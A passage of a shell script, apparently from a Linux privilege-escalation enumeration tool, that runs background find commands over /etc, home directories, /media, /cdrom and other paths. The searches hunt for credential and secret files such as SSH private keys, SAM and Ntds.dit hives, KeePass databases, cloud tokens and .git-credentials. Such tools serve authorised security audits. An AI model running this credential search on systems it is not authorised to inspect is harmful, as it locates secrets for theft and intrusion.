-o -name \"datasources.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"known_hosts\" -o -name \"*.gnupg\" -o -name \"iis6.log\" -o -name \"*vnc*.ini\" -o -name \".plan\" -o -name \".rhosts\" -o -name \"000-default.conf\" -o -name \"*config*.php\" -o -name \".env\" -o -name \"*.csr\" -o -name \"index.dat\" -o -name \"gitlab.rm\" -o -name \"AppEvent.Evt\" -o -name \"*.db\" -o -name \"jetty-realm.properties\" -o -name \".git\" -o -name \"unattend.xml\" -o -name \"*vnc*.c*nf*\" -o -name \"passwd\" -o -name \"storage.php\" -o -name \"autologin.conf\" -o -name \"gitlab.yml\" -o -name \"web*.config\" -o -name \"mariadb.cnf\" -o -name \".erlang.cookie\" -o -name \"*.gpg\" -o -name \"backup\" -o -name \".recently-used.xbel\" -o -name \"sysprep.xml\" -o -name \"id_rsa*\" -o -name \"*.der\" -o -name \"drives.xml\" -o -name \"ftp.config\" -o -name \"postgresql.conf\" -o -name \"passbolt.php\" -o -name \"FreeSSHDservice.ini\" -o -name \"database.php\" -o -name \"docker.socket\" -o -name \"KeePass.enforced*\" -o -name \"access.log\" -o -name \".lesshst\" -o -name \"*credential*\" -o -name \"azureProfile.json\" -o -name \"SYSTEM\" -o -name \"vault-ssh-helper.hcl\" -o -name \"hostapd.conf\" -o -name \"setupinfo\" -o -name \"wp-config.php\" -o -name \".secrets.mkey\" -o -name \"krb5.conf\" -o -name \"Ntds.dit\" -o -name \"*.viminfo\" -o -name \"Dockerfile\" -o -name \"mosquitto.conf\" -o -name \"scheduledtasks.xml\" -o -name \"settings.php\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"kadm5.acl\" -o -name \"*.rdg\" -o -name \"recentservers.xml\" -o -name \"php.ini\" -o -name \"AzureRMContext.json\" -o -name \"ipsec.conf\" -o -name \"*.pfx\" -o -name \"docker.sock\" -o -name \"id_dsa*\" -o -name \".gitconfig\" -o -name \"winscp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"ffftp.ini\" -o -name \"mongod*.conf\" -o -name \"racoon.conf\" -o -name \"pgsql.conf\" -o -name \"*vnc*.txt\" -o -name \"scclient.exe\" -o -name \"krb5.keytab\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"accessTokens.json\" -o -name \"*.jks\" -o -name \"SAM\" -o -name \"protecteduserkey.bin\" -o -name \"*.timer\" -o -name \"https.conf\" -o -name \"*.key\" -o -name \".wgetrc\" -o -name \"NetSetup.log\" -o -name \"rsyncd.secrets\" -o -name \"pgadmin*.db\" -o -name \"psk.txt\" -o -name \"*.pem\" -o -name \"snmpd.conf\" -o -name \"ftp.ini\" -o -name \"*.ovpn\" -o -name \".github\" -o -name \"wsl.exe\" -o -name \"ConsoleHost_history.txt\" -o -name \".bashrc\" -o -name \"*.keystore\" -o -name \".k5login\" -o -name \"bash.exe\" -o -name \"appcmd.exe\" -o -name \"supervisord.conf\" -o -name \".profile\" -o -name \"sysprep.inf\" -o -name \"ws_ftp.ini\" -o -name \"*.sqlite\" -o -name \"*.keyring\" -o -name \"*.kdbx\" -o -name \".htpasswd\" -o -name \"*.psk\" -o -name \"unattended.xml\" -o -name \".msmtprc\" -o -name \"sentry.conf.py\" -o -name \"anaconda-ks.cfg\" -o -name \"https-xampp.conf\" -o -name \"KeePass.ini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_CACHE=`eval_bckgrd "find /.cache -name \"groups.xml\" -o -name \"cloud.cfg\" -o -name \"*.crt\" -o -name \"*.cer\" -o -name \"autologin\" -o -name \"error.log\" -o -name \"printers.xml\" -o -name \"credentials\" -o -name \"fastcgi_params\" -o -name \"wcx_ftp.ini\" -o -name \"backups\" -o -name \"*vnc*.xml\" -o -name \"my.cnf\" -o -name \"influxdb.conf\" -o -name \"hosts.equiv\" -o -name \"creds*\" -o -name \"*.socket\" -o -name \"gvm-tools.conf\" -o -name \"*.pgp\" -o -name \"access_tokens.json\" -o -name \"tomcat-users.xml\" -o -name \"*.sqlite3\" -o -name \"zabbix_server.conf\" -o -name \"*_history*\" -o -name \"SecEvent.Evt\" -o -name \"kcpassword\" -o -name \"docker-compose.yml\" -o -name \"my.ini\" -o -name \".git-credentials\" -o -name \"authorized_keys\" -o -name \"authorized_hosts\" -o -name \"sitemanager.xml\" -o -name \"pg_hba.conf\" -o -name \".vault-token\" -o -name \"secrets.yml\" -o -name \"*.p12\" -o -name \"filezilla.xml\" -o -name \"RDCMan.settings\" -o -name \"secrets.ldb\" -o -name \"ntuser.dat\" -o -name \"system.sav\" -o -name \"software\" -o -name \".ldaprc\" -o -name \"TokenCache.dat\" -o -name \"server.xml\" -o -name \"legacy_credentials.db\" -o -name \"security.sav\" -o -name \"default.sav\" -o -name \"sssd.conf\" -o -name \"rsyncd.conf\" -o -name \"*.swp\" -o -name \"httpd.conf\" -o -name \"redis.conf\" -o -name \"credentials.db\" -o -name \"unattend.inf\" -o -name \"ipsec.secrets\" -o -name \".pypirc\" -o -name \"*password*\" -o -name \".google_authenticator\" -o -name \"*.service\" -o -name \"KeePass.config*\" -o -name \"sites.ini\" -o -name \"unattend.txt\" -o -name \"setupinfo.bak\" -o -name \"pagefile.sys\" -o -name \"kibana.y*ml\" -o -name \"zabbix_agentd.conf\" -o -name \"db.php\" -o -name \"ddclient.conf\" -o -name \"*.ftpconfig\" -o -name \"debian.cnf\" -o -name \"datasources.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"known_hosts\" -o -name \"*.gnupg\" -o -name \"iis6.log\" -o -name \"*vnc*.ini\" -o -name \".plan\" -o -name \".rhosts\" -o -name \"000-default.conf\" -o -name \"*config*.php\" -o -name \".env\" -o -name \"*.csr\" -o -name \"index.dat\" -o -name \"gitlab.rm\" -o -name \"AppEvent.Evt\" -o -name \"*.db\" -o -name \"jetty-realm.properties\" -o -name \".git\" -o -name \"unattend.xml\" -o -name \"*vnc*.c*nf*\" -o -name \"passwd\" -o -name \"storage.php\" -o -name \"autologin.conf\" -o -name \"gitlab.yml\" -o -name \"web*.config\" -o -name \"mariadb.cnf\" -o -name \".erlang.cookie\" -o -name \"*.gpg\" -o -name \"backup\" -o -name \".recently-used.xbel\" -o -name \"sysprep.xml\" -o -name \"id_rsa*\" -o -name \"*.der\" -o -name \"drives.xml\" -o -name \"ftp.config\" -o -name \"postgresql.conf\" -o -name \"passbolt.php\" -o -name \"FreeSSHDservice.ini\" -o -name \"database.php\" -o -name \"docker.socket\" -o -name \"KeePass.enforced*\" -o -name \"access.log\" -o -name \".lesshst\" -o -name \"*credential*\" -o -name \"azureProfile.json\" -o -name \"SYSTEM\" -o -name \"vault-ssh-helper.hcl\" -o -name \"hostapd.conf\" -o -name \"setupinfo\" -o -name \"wp-config.php\" -o -name \".secrets.mkey\" -o -name \"krb5.conf\" -o -name \"Ntds.dit\" -o -name \"*.viminfo\" -o -name \"Dockerfile\" -o -name \"mosquitto.conf\" -o -name \"scheduledtasks.xml\" -o -name \"settings.php\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"kadm5.acl\" -o -name \"*.rdg\" -o -name \"recentservers.xml\" -o -name \"php.ini\" -o -name \"AzureRMContext.json\" -o -name \"ipsec.conf\" -o -name \"*.pfx\" -o -name \"docker.sock\" -o -name \"id_dsa*\" -o -name \".gitconfig\" -o -name \"winscp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"ffftp.ini\" -o -name \"mongod*.conf\" -o -name \"racoon.conf\" -o -name \"pgsql.conf\" -o -name \"*vnc*.txt\" -o -name \"scclient.exe\" -o -name \"krb5.keytab\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"accessTokens.json\" -o -name \"*.jks\" -o -name \"SAM\" -o -name \"protecteduserkey.bin\" -o -name \"*.timer\" -o -name \"https.conf\" -o -name \"*.key\" -o -name \".wgetrc\" -o -name \"NetSetup.log\" -o -name \"rsyncd.secrets\" -o -name \"pgadmin*.db\" -o -name \"psk.txt\" -o -name \"*.pem\" -o -name \"snmpd.conf\" -o -name \"ftp.ini\" -o -name \"*.ovpn\" -o -name \".github\" -o -name \"wsl.exe\" -o -name \"ConsoleHost_history.txt\" -o -name \".bashrc\" -o -name \"*.keystore\" -o -name \".k5login\" -o -name \"bash.exe\" -o -name \"appcmd.exe\" -o -name \"supervisord.conf\" -o -name \".profile\" -o -name \"sysprep.inf\" -o -name \"ws_ftp.ini\" -o -name \"*.sqlite\" -o -name \"*.keyring\" -o -name \"*.kdbx\" -o -name \".htpasswd\" -o -name \"*.psk\" -o -name \"unattended.xml\" -o -name \".msmtprc\" -o -name \"sentry.conf.py\" -o -name \"anaconda-ks.cfg\" -o -name \"https-xampp.conf\" -o -name \"KeePass.ini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_CDROM=`eval_bckgrd "find /cdrom -name \"groups.xml\" -o -name \"cloud.cfg\" -o -name \"*.crt\" -o -name \"*.cer\" -o -name \"autologin\" -o -name \"error.log\" -o -name \"printers.xml\" -o -name \"credentials\" -o -name \"fastcgi_params\" -o -name \"wcx_ftp.ini\" -o -name \"backups\" -o -name \"*vnc*.xml\" -o -name \"my.cnf\" -o -name \"influxdb.conf\" -o -name \"hosts.equiv\" -o -name \"creds*\" -o -name \"*.socket\" -o -name \"gvm-tools.conf\" -o -name \"*.pgp\" -o -name \"access_tokens.json\" -o -name \"tomcat-users.xml\" -o -name \"*.sqlite3\" -o -name \"zabbix_server.conf\" -o -name \"*_history*\" -o -name \"SecEvent.Evt\" -o -name \"kcpassword\" -o -name \"docker-compose.yml\" -o -name \"my.ini\" -o -name \".git-credentials\" -o -name \"authorized_keys\" -o -name \"authorized_hosts\" -o -name \"sitemanager.xml\" -o -name \"pg_hba.conf\" -o -name \".vault-token\" -o -name \"secrets.yml\" -o -name \"*.p12\" -o -name \"filezilla.xml\" -o -name \"RDCMan.settings\" -o -name \"secrets.ldb\" -o -name \"ntuser.dat\" -o -name \"system.sav\" -o -name \"software\" -o -name \".ldaprc\" -o -name \"TokenCache.dat\" -o -name \"server.xml\" -o -name \"legacy_credentials.db\" -o -name \"security.sav\" -o -name \"default.sav\" -o -name \"sssd.conf\" -o -name \"rsyncd.conf\" -o -name \"*.swp\" -o -name \"httpd.conf\" -o -name \"redis.conf\" -o -name \"credentials.db\" -o -name \"unattend.inf\" -o -name \"ipsec.secrets\" -o -name \".pypirc\" -o -name \"*password*\" -o -name \".google_authenticator\" -o -name \"*.service\" -o -name \"KeePass.config*\" -o -name \"sites.ini\" -o -name \"unattend.txt\" -o -name \"setupinfo.bak\" -o -name \"pagefile.sys\" -o -name \"kibana.y*ml\" -o -name \"zabbix_agentd.conf\" -o -name \"db.php\" -o -name \"ddclient.conf\" -o -name \"*.ftpconfig\" -o -name \"debian.cnf\" -o -name \"datasources.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"known_hosts\" -o -name \"*.gnupg\" -o -name \"iis6.log\" -o -name \"*vnc*.ini\" -o -name \".plan\" -o -name \".rhosts\" -o -name \"000-default.conf\" -o -name \"*config*.php\" -o -name \".env\" -o -name \"*.csr\" -o -name \"index.dat\" -o -name \"gitlab.rm\" -o -name \"AppEvent.Evt\" -o -name \"*.db\" -o -name \"jetty-realm.properties\" -o -name \".git\" -o -name \"unattend.xml\" -o -name \"*vnc*.c*nf*\" -o -name \"passwd\" -o -name \"storage.php\" -o -name \"autologin.conf\" -o -name \"gitlab.yml\" -o -name \"web*.config\" -o -name \"mariadb.cnf\" -o -name \".erlang.cookie\" -o -name \"*.gpg\" -o -name \"backup\" -o -name \".recently-used.xbel\" -o -name \"sysprep.xml\" -o -name \"id_rsa*\" -o -name \"*.der\" -o -name \"drives.xml\" -o -name \"ftp.config\" -o -name \"postgresql.conf\" -o -name \"passbolt.php\" -o -name \"FreeSSHDservice.ini\" -o -name \"database.php\" -o -name \"docker.socket\" -o -name \"KeePass.enforced*\" -o -name \"access.log\" -o -name \".lesshst\" -o -name \"*credential*\" -o -name \"azureProfile.json\" -o -name \"SYSTEM\" -o -name \"vault-ssh-helper.hcl\" -o -name \"hostapd.conf\" -o -name \"setupinfo\" -o -name \"wp-config.php\" -o -name \".secrets.mkey\" -o -name \"krb5.conf\" -o -name \"Ntds.dit\" -o -name \"*.viminfo\" -o -name \"Dockerfile\" -o -name \"mosquitto.conf\" -o -name \"scheduledtasks.xml\" -o -name \"settings.php\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"kadm5.acl\" -o -name \"*.rdg\" -o -name \"recentservers.xml\" -o -name \"php.ini\" -o -name \"AzureRMContext.json\" -o -name \"ipsec.conf\" -o -name \"*.pfx\" -o -name \"docker.sock\" -o -name \"id_dsa*\" -o -name \".gitconfig\" -o -name \"winscp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"ffftp.ini\" -o -name \"mongod*.conf\" -o -name \"racoon.conf\" -o -name \"pgsql.conf\" -o -name \"*vnc*.txt\" -o -name \"scclient.exe\" -o -name \"krb5.keytab\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"accessTokens.json\" -o -name \"*.jks\" -o -name \"SAM\" -o -name \"protecteduserkey.bin\" -o -name \"*.timer\" -o -name \"https.conf\" -o -name \"*.key\" -o -name \".wgetrc\" -o -name \"NetSetup.log\" -o -name \"rsyncd.secrets\" -o -name \"pgadmin*.db\" -o -name \"psk.txt\" -o -name \"*.pem\" -o -name \"snmpd.conf\" -o -name \"ftp.ini\" -o -name \"*.ovpn\" -o -name \".github\" -o -name \"wsl.exe\" -o -name \"ConsoleHost_history.txt\" -o -name \".bashrc\" -o -name \"*.keystore\" -o -name \".k5login\" -o -name \"bash.exe\" -o -name \"appcmd.exe\" -o -name \"supervisord.conf\" -o -name \".profile\" -o -name \"sysprep.inf\" -o -name \"ws_ftp.ini\" -o -name \"*.sqlite\" -o -name \"*.keyring\" -o -name \"*.kdbx\" -o -name \".htpasswd\" -o -name \"*.psk\" -o -name \"unattended.xml\" -o -name \".msmtprc\" -o -name \"sentry.conf.py\" -o -name \"anaconda-ks.cfg\" -o -name \"https-xampp.conf\" -o -name \"KeePass.ini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_ETC=`eval_bckgrd "find /etc -name \"groups.xml\" -o -name \"cloud.cfg\" -o -name \"*.crt\" -o -name \"*.cer\" -o -name \"autologin\" -o -name \"error.log\" -o -name \"printers.xml\" -o -name \"credentials\" -o -name \"fastcgi_params\" -o -name \"wcx_ftp.ini\" -o -name \"backups\" -o -name \"*vnc*.xml\" -o -name \"my.cnf\" -o -name \"influxdb.conf\" -o -name \"hosts.equiv\" -o -name \"creds*\" -o -name \"*.socket\" -o -name \"gvm-tools.conf\" -o -name \"*.pgp\" -o -name \"access_tokens.json\" -o -name \"tomcat-users.xml\" -o -name \"*.sqlite3\" -o -name \"zabbix_server.conf\" -o -name \"*_history*\" -o -name \"SecEvent.Evt\" -o -name \"kcpassword\" -o -name \"docker-compose.yml\" -o -name \"my.ini\" -o -name \".git-credentials\" -o -name \"authorized_keys\" -o -name \"authorized_hosts\" -o -name \"sitemanager.xml\" -o -name \"pg_hba.conf\" -o -name \".vault-token\" -o -name \"secrets.yml\" -o -name \"*.p12\" -o -name \"filezilla.xml\" -o -name \"RDCMan.settings\" -o -name \"secrets.ldb\" -o -name \"ntuser.dat\" -o -name \"system.sav\" -o -name \"software\" -o -name \".ldaprc\" -o -name \"TokenCache.dat\" -o -name \"server.xml\" -o -name \"legacy_credentials.db\" -o -name \"security.sav\" -o -name \"default.sav\" -o -name \"sssd.conf\" -o -name \"rsyncd.conf\" -o -name \"*.swp\" -o -name \"httpd.conf\" -o -name \"redis.conf\" -o -name \"credentials.db\" -o -name \"unattend.inf\" -o -name \"ipsec.secrets\" -o -name \".pypirc\" -o -name \"*password*\" -o -name \".google_authenticator\" -o -name \"*.service\" -o -name \"KeePass.config*\" -o -name \"sites.ini\" -o -name \"unattend.txt\" -o -name \"setupinfo.bak\" -o -name \"pagefile.sys\" -o -name \"kibana.y*ml\" -o -name \"zabbix_agentd.conf\" -o -name \"db.php\" -o -name \"ddclient.conf\" -o -name \"*.ftpconfig\" -o -name \"debian.cnf\" -o -name \"datasources.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"known_hosts\" -o -name \"*.gnupg\" -o -name \"iis6.log\" -o -name \"*vnc*.ini\" -o -name \".plan\" -o -name \".rhosts\" -o -name \"000-default.conf\" -o -name \"*config*.php\" -o -name \".env\" -o -name \"*.csr\" -o -name \"index.dat\" -o -name \"gitlab.rm\" -o -name \"AppEvent.Evt\" -o -name \"*.db\" -o -name \"jetty-realm.properties\" -o -name \".git\" -o -name \"unattend.xml\" -o -name \"*vnc*.c*nf*\" -o -name \"passwd\" -o -name \"storage.php\" -o -name \"autologin.conf\" -o -name \"gitlab.yml\" -o -name \"web*.config\" -o -name \"mariadb.cnf\" -o -name \".erlang.cookie\" -o -name \"*.gpg\" -o -name \"backup\" -o -name \".recently-used.xbel\" -o -name \"sysprep.xml\" -o -name \"id_rsa*\" -o -name \"*.der\" -o -name \"drives.xml\" -o -name \"ftp.config\" -o -name \"postgresql.conf\" -o -name \"passbolt.php\" -o -name \"FreeSSHDservice.ini\" -o -name \"database.php\" -o -name \"docker.socket\" -o -name \"KeePass.enforced*\" -o -name \"access.log\" -o -name \".lesshst\" -o -name \"*credential*\" -o -name \"azureProfile.json\" -o -name \"SYSTEM\" -o -name \"vault-ssh-helper.hcl\" -o -name \"hostapd.conf\" -o -name \"setupinfo\" -o -name \"wp-config.php\" -o -name \".secrets.mkey\" -o -name \"krb5.conf\" -o -name \"Ntds.dit\" -o -name \"*.viminfo\" -o -name \"Dockerfile\" -o -name \"mosquitto.conf\" -o -name \"scheduledtasks.xml\" -o -name \"settings.php\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"kadm5.acl\" -o -name \"*.rdg\" -o -name \"recentservers.xml\" -o -name \"php.ini\" -o -name \"AzureRMContext.json\" -o -name \"ipsec.conf\" -o -name \"*.pfx\" -o -name \"docker.sock\" -o -name \"id_dsa*\" -o -name \".gitconfig\" -o -name \"winscp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"ffftp.ini\" -o -name \"mongod*.conf\" -o -name \"racoon.conf\" -o -name \"pgsql.conf\" -o -name \"*vnc*.txt\" -o -name \"scclient.exe\" -o -name \"krb5.keytab\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"accessTokens.json\" -o -name \"*.jks\" -o -name \"SAM\" -o -name \"protecteduserkey.bin\" -o -name \"*.timer\" -o -name \"https.conf\" -o -name \"*.key\" -o -name \".wgetrc\" -o -name \"NetSetup.log\" -o -name \"rsyncd.secrets\" -o -name \"pgadmin*.db\" -o -name \"psk.txt\" -o -name \"*.pem\" -o -name \"snmpd.conf\" -o -name \"ftp.ini\" -o -name \"*.ovpn\" -o -name \"exports\" -o -name \".github\" -o -name \"wsl.exe\" -o -name \"ConsoleHost_history.txt\" -o -name \".bashrc\" -o -name \"*.keystore\" -o -name \".k5login\" -o -name \"bash.exe\" -o -name \"appcmd.exe\" -o -name \"supervisord.conf\" -o -name \".profile\" -o -name \"sysprep.inf\" -o -name \"ws_ftp.ini\" -o -name \"*knockd*\" -o -name \"*.sqlite\" -o -name \"*.keyring\" -o -name \"*.kdbx\" -o -name \".htpasswd\" -o -name \"*.psk\" -o -name \"unattended.xml\" -o -name \".msmtprc\" -o -name \"sentry.conf.py\" -o -name \"anaconda-ks.cfg\" -o -name \"https-xampp.conf\" -o -name \"KeePass.ini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_HOMESEARCH=`eval_bckgrd "find $HOMESEARCH -name \"groups.xml\" -o -name \"cloud.cfg\" -o -name \"*.crt\" -o -name \"*.cer\" -o -name \"autologin\" -o -name \"error.log\" -o -name \"printers.xml\" -o -name \"credentials\" -o -name \"fastcgi_params\" -o -name \"wcx_ftp.ini\" -o -name \"backups\" -o -name \"*vnc*.xml\" -o -name \"my.cnf\" -o -name \"influxdb.conf\" -o -name \"hosts.equiv\" -o -name \"creds*\" -o -name \"*.socket\" -o -name \"gvm-tools.conf\" -o -name \"*.pgp\" -o -name \"access_tokens.json\" -o -name \"tomcat-users.xml\" -o -name \"*.sqlite3\" -o -name \"zabbix_server.conf\" -o -name \"*_history*\" -o -name \"SecEvent.Evt\" -o -name \"kcpassword\" -o -name \"docker-compose.yml\" -o -name \"my.ini\" -o -name \".git-credentials\" -o -name \"authorized_keys\" -o -name \"authorized_hosts\" -o -name \"sitemanager.xml\" -o -name \"pg_hba.conf\" -o -name \".vault-token\" -o -name \"secrets.yml\" -o -name \"*.p12\" -o -name \"filezilla.xml\" -o -name \"RDCMan.settings\" -o -name \"secrets.ldb\" -o -name \"ntuser.dat\" -o -name \"system.sav\" -o -name \"software\" -o -name \".ldaprc\" -o -name \"TokenCache.dat\" -o -name \"server.xml\" -o -name \"legacy_credentials.db\" -o -name \"security.sav\" -o -name \"default.sav\" -o -name \"sssd.conf\" -o -name \"rsyncd.conf\" -o -name \"*.swp\" -o -name \"httpd.conf\" -o -name \"redis.conf\" -o -name \"credentials.db\" -o -name \"unattend.inf\" -o -name \"ipsec.secrets\" -o -name \".pypirc\" -o -name \"*password*\" -o -name \".google_authenticator\" -o -name \"*.service\" -o -name \"KeePass.config*\" -o -name \"sites.ini\" -o -name \"unattend.txt\" -o -name \"setupinfo.bak\" -o -name \"pagefile.sys\" -o -name \"kibana.y*ml\" -o -name \"zabbix_agentd.conf\" -o -name \"db.php\" -o -name \"ddclient.conf\" -o -name \"*.ftpconfig\" -o -name \"debian.cnf\" -o -name \"datasources.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"known_hosts\" -o -name \"*.gnupg\" -o -name \"iis6.log\" -o -name \"*vnc*.ini\" -o -name \".plan\" -o -name \".rhosts\" -o -name \"000-default.conf\" -o -name \"*config*.php\" -o -name \".env\" -o -name \"*.csr\" -o -name \"index.dat\" -o -name \"gitlab.rm\" -o -name \"AppEvent.Evt\" -o -name \"*.db\" -o -name \"jetty-realm.properties\" -o -name \".git\" -o -name \"unattend.xml\" -o -name \"*vnc*.c*nf*\" -o -name \"passwd\" -o -name \"storage.php\" -o -name \"autologin.conf\" -o -name \"gitlab.yml\" -o -name \"web*.config\" -o -name \"mariadb.cnf\" -o -name \".erlang.cookie\" -o -name \"*.gpg\" -o -name \"backup\" -o -name \".recently-used.xbel\" -o -name \"sysprep.xml\" -o -name \"id_rsa*\" -o -name \"*.der\" -o -name \"drives.xml\" -o -name \"ftp.config\" -o -name \"postgresql.conf\" -o -name \"passbolt.php\" -o -name \"FreeSSHDservice.ini\" -o -name \"database.php\" -o -name \"docker.socket\" -o -name \"KeePass.enforced*\" -o -name \"access.log\" -o -name \".lesshst\" -o -name \"*credential*\" -o -name \"azureProfile.json\" -o -name \"SYSTEM\" -o -name \"vault-ssh-helper.hcl\" -o -name \"hostapd.conf\" -o -name \"setupinfo\" -o -name \"wp-config.php\" -o -name \".secrets.mkey\" -o -name \"krb5.conf\" -o -name \"Ntds.dit\" -o -name \"*.viminfo\" -o -name \"Dockerfile\" -o -name \"mosquitto.conf\" -o -name \"scheduledtasks.xml\" -o -name \"settings.php\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"kadm5.acl\" -o -name \"*.rdg\" -o -name \"recentservers.xml\" -o -name \"php.ini\" -o -name \"AzureRMContext.json\" -o -name \"ipsec.conf\" -o -name \"*.pfx\" -o -name \"docker.sock\" -o -name \"id_dsa*\" -o -name \".gitconfig\" -o -name \"winscp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"ffftp.ini\" -o -name \"mongod*.conf\" -o -name \"racoon.conf\" -o -name \"pgsql.conf\" -o -name \"*vnc*.txt\" -o -name \"scclient.exe\" -o -name \"krb5.keytab\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"accessTokens.json\" -o -name \"*.jks\" -o -name \"SAM\" -o -name \"protecteduserkey.bin\" -o -name \"*.timer\" -o -name \"https.conf\" -o -name \"*.key\" -o -name \".wgetrc\" -o -name \"NetSetup.log\" -o -name \"rsyncd.secrets\" -o -name \"pgadmin*.db\" -o -name \"psk.txt\" -o -name \"*.pem\" -o -name \"snmpd.conf\" -o -name \"ftp.ini\" -o -name \"*.ovpn\" -o -name \".github\" -o -name \"wsl.exe\" -o -name \"ConsoleHost_history.txt\" -o -name \"ssh*config\" -o -name \".bashrc\" -o -name \"*.keystore\" -o -name \".k5login\" -o -name \"bash.exe\" -o -name \"appcmd.exe\" -o -name \"supervisord.conf\" -o -name \".profile\" -o -name \"sysprep.inf\" -o -name \"ws_ftp.ini\" -o -name \"*.sqlite\" -o -name \"*.keyring\" -o -name \"*.kdbx\" -o -name \".htpasswd\" -o -name \"*.psk\" -o -name \"unattended.xml\" -o -name \".msmtprc\" -o -name \"sentry.conf.py\" -o -name \"anaconda-ks.cfg\" -o -name \"https-xampp.conf\" -o -name \"KeePass.ini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_LIB=`eval_bckgrd "find /lib -name \"*.service\" -o -name \"*.socket\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_LIB32=`eval_bckgrd "find /lib32 -name \"*.service\" -o -name \"*.socket\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_LIB64=`eval_bckgrd "find /lib64 -name \"*.service\" -o -name \"*.socket\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_MEDIA=`eval_bckgrd "find /media -name \"groups.xml\" -o -name \"cloud.cfg\" -o -name \"*.crt\" -o -name \"*.cer\" -o -name \"autologin\" -o -name \"error.log\" -o -name \"printers.xml\" -o -name \"credentials\" -o -name \"fastcgi_params\" -o -name \"wcx_ftp.ini\" -o -name \"backups\" -o -name \"*vnc*.xml\" -o -name \"my.cnf\" -o -name \"influxdb.conf\" -o -name \"hosts.equiv\" -o -name \"creds*\" -o -name \"*.socket\" -o -name \"gvm-tools.conf\" -o -name \"*.pgp\" -o -name \"access_tokens.json\" -o -name \"tomcat-users.xml\" -o -name \"*.sqlite3\" -o -name \"zabbix_server.conf\" -o -name \"*_history*\" -o -name \"SecEvent.Evt\" -o -name \"kcpassword\" -o -name \"docker-compose.yml\" -o -name \"my.ini\" -o -name \".git-credentials\" -o -name \"authorized_keys\" -o -name \"authorized_hosts\" -o -name \"sitemanager.xml\" -o -name \"pg_hba.conf\" -o -name \".vault-token\" -o -name \"secrets.yml\" -o -name \"*.p12\" -o -name \"filezilla.xml\" -o -name \"RDCMan.settings\" -o -name \"secrets.ldb\" -o -name \"ntuser.dat\" -o -name \"system.sav\" -o -name \"software\" -o -name \".ldaprc\" -o -name \"TokenCache.dat\" -o -name \"server.xml\" -o -name \"legacy_credentials.db\" -o -name \"security.sav\" -o -name \"default.sav\" -o -name \"sssd.conf\" -o -name \"rsyncd.conf\" -o -name \"*.swp\" -o -name \"httpd.conf\" -o -name \"redis.conf\" -o -name \"credentials.db\" -o -name \"unattend.inf\" -o -name \"ipsec.secrets\" -o -name \".pypirc\" -o -name \"*password*\" -o -name \".google_authenticator\" -o -name \"*.service\" -o -name \"KeePass.config*\" -o -name \"sites.ini\" -o -name \"unattend.txt\" -o -name \"setupinfo.bak\" -o -name \"pagefile.sys\" -o -name \"kibana.y*ml\" -o -name \"zabbix_agentd.conf\" -o -name \"db.php\" -o -name \"ddclient.conf\" -o -name \"*.ftpconfig\" -o -name \"debian.cnf\" -o -name \"datasources.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"known_hosts\" -o -name \"*.gnupg\" -o -name \"iis6.log\" -o -name \"*vnc*.ini\" -o -name \".plan\" -o -name \".rhosts\" -o -name \"000-default.conf\" -o -name \"*config*.php\" -o -name \".env\" -o -name \"*.csr\" -o -name \"index.dat\" -o -name \"gitlab.rm\" -o -name \"AppEvent.Evt\" -o -name \"*.db\" -o -name \"jetty-realm.properties\" -o -name \".git\" -o -name \"unattend.xml\" -o -name \"*vnc*.c*nf*\" -o -name \"passwd\" -o -name \"storage.php\" -o -name \"autologin.conf\" -o -name \"gitlab.yml\" -o -name \"web*.config\" -o -name \"mariadb.cnf\" -o -name \".erlang.cookie\" -o -name \"*.gpg\" -o -name \"backup\" -o -name \".recently-used.xbel\" -o -name \"sysprep.xml\" -o -name \"id_rsa*\" -o -name \"*.der\" -o -name \"drives.xml\" -o -name \"ftp.config\" -o -name \"postgresql.conf\" -o -name \"passbolt.php\" -o -name \"FreeSSHDservice.ini\" -o -name \"database.php\" -o -name \"docker.socket\" -o -name \"KeePass.enforced*\" -o -name \"access.log\" -o -name \".lesshst\" -o -name \"*credential*\" -o -name \"azureProfile.json\" -o -name \"SYSTEM\" -o -name \"vault-ssh-helper.hcl\" -o -name \"hostapd.conf\" -o -name \"setupinfo\" -o -name \"wp-config.php\" -o -name \".secrets.mkey\" -o -name \"krb5.conf\" -o -name \"Ntds.dit\" -o -name \"*.viminfo\" -o -name \"Dockerfile\" -o -name \"mosquitto.conf\" -o -name \"scheduledtasks.xml\" -o -name \"settings.php\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"kadm5.acl\" -o -name \"*.rdg\" -o -name \"recentservers.xml\" -o -name \"php.ini\" -o -name \"AzureRMContext.json\" -o -name \"ipsec.conf\" -o -name \"*.pfx\" -o -name \"docker.sock\" -o -name \"id_dsa*\" -o -name \".gitconfig\" -o -name \"winscp.ini\" -o -name \".sudo_as_admin_successful\" -o -name 